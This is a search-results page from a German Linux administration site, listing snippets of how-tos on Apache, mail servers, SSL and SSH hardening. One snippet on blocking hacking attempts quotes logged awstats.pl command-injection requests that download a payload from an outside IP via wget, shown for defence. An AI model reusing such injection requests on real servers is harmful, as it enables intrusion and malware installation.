Linux-Distributionen
Huschi als Linux-Admin
Volltextsuche
188 Suchergebnisse
Seite 4 von 13 Seiten
- Web-Server:
suExec/suExec2 neu compilierenProblem: Z.B. bei einem Update von Apache wurde die suexec (suexec2) durch die von Apache mitgelieferte suexec (suexec2) ersetzt.Danach funktioniert kein CGI-Script mehr, weil die neue - Mail-Server:
ESMTP-Dialog (SMTP-Auth)ESMTP-Dialog Ein SMTP-Dialog wurde bereits vorgestellt. Heute erkläre ich einen ESMTP-Dialog mit verschiedenen Authentifizierungsmethoden. Wir sehen uns drei Auth-Methods an: PLAIN LOGIN CRAM-MD5 PLAIN Die Methode PLAIN wird von Netscape/Mozilla/Thunderbird bevorzugt. Dies - Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Web-Server:
SSL für eine Domain einrichtenFrage: Wie kann man einen VirtualHost auf SSL umstellen? Lösung: Einfach den vorhanden NameVirtualHost my.ip:443<VirtualHost my.ip:443> SSLEngine On - Linux-Distributionen » Debian:
Debian: Java-VM installierenProblem: Da Debian grundsätzlich nur freie Software unterstützt, hat man entsprechend mit Hindernissen zu rechnen, sobald es um kommerzielle Software geht. Die Installation einer Java-VM ist so - Mail-Server » Postfix:
Postfix: fine tuningProblem: Für einen Einsatz als High-Traffic-Server braucht Postfix noch ein paar Änderungen um den Traffic-Aufwand wirklich beweltigen zu können.Dies sind aber keine Spielerei-Einstellungen. Sondern sollten wirklich - Security & Firewalls:
SSH-BruteForce-Attacken eindämmenProblem: In den Logfiles stehen ständig Misslungene Einbruchsversuche auf dem SSH-Port. Lösungen: a) SSH-Port verlegen: in sshd_config den Parameter Port oder ListenAddress setzen. b) Per PAM-Modul: pam_abl c) Per - Web-Server:
Apache-VirtualHost vollständig unter verschiedenen BenutzernProblem: Scripte werden (je nach Installation) unter anderen Benutzerrechten gestartet als z.B. der FTP-Benuzter. Z.B. PHP-Scripte als wwwrun. Lösung: Dies kann man entweder mit suExec oder suPHP - Scripting:
Perl: life with CPANProblem: Warum soll man sich schon wieder mit einem neuen Packet-System anfreunden, nur um irgendein Perl-Script zum laufen zu bringen... :( Erklärung: CPAN heißt Comprehensive Perl Archive Network - Mail-Server » Qmail:
Plesk & Qmail: Spamprotection mit GreylistingWas macht greylist? Greylisting ist eine effektive Methode zur Spam-Protection. Es block jede Email beim ersten Versuch. Erst wenn diese Email ein zweites Mal eingeliefert werden - Scripting:
Links: PHP-/CGI-Script-ArchivePHP-Scripte: phpfinder.de hotscripts.com kostenlose-scripts.de Perl-Scripte: perlscripts.de kostenlose-scripts.de - Virtuelle Server:
HOWTO: Debian auf vServer installierenWie man einen SuSE-vServer (ja Virtuellen-Server!) in einen Debian-vServer verwandelt kann man im Server-Support-Forum nachlesen: Link Evtl. wird dieses Howto auch mal hier erscheinen. Aber erstmal muß - Allgemeinwissen » Linux-Links:
Nützliche Links zu Emails und Spam.Spam: spamid.net: Hier wird der Email-Header nach einem möglichen Verursacher durchsucht. Zusätzlich kann man sich noch die RIPE-Informationen des ugehörigen Netzwerks anzeigen lassen.SpamAssassin Configuration Generator: Hier - Mail-Server » Qmail:
Plesk: Spamassassin und ClamAV per qsheff einbindenDas Orginal stammt aus dem Server-Support-Forum: V-Server Strato Spamassassin + ClamAV HowTo mit Qsheff (Ich veröffentliche es mit freundlicher Genemigung des Autors Dennis Hoofe.Verbessert mit Hilfe vom - Mail-Server:
Fetchmail: "Server-CommonName stimmt nicht überein"Problem:Im Logfile /var/log/fetchmail taucht immer wieder folgender Fehler auf:fetchmail: Server-CommonName stimmt nicht überein: mx.freenet.de != pop3.freenet.de Erklärung:Fetchmail ist offenbar standardmässig auf SSL konfiguriert. D.h. er versucht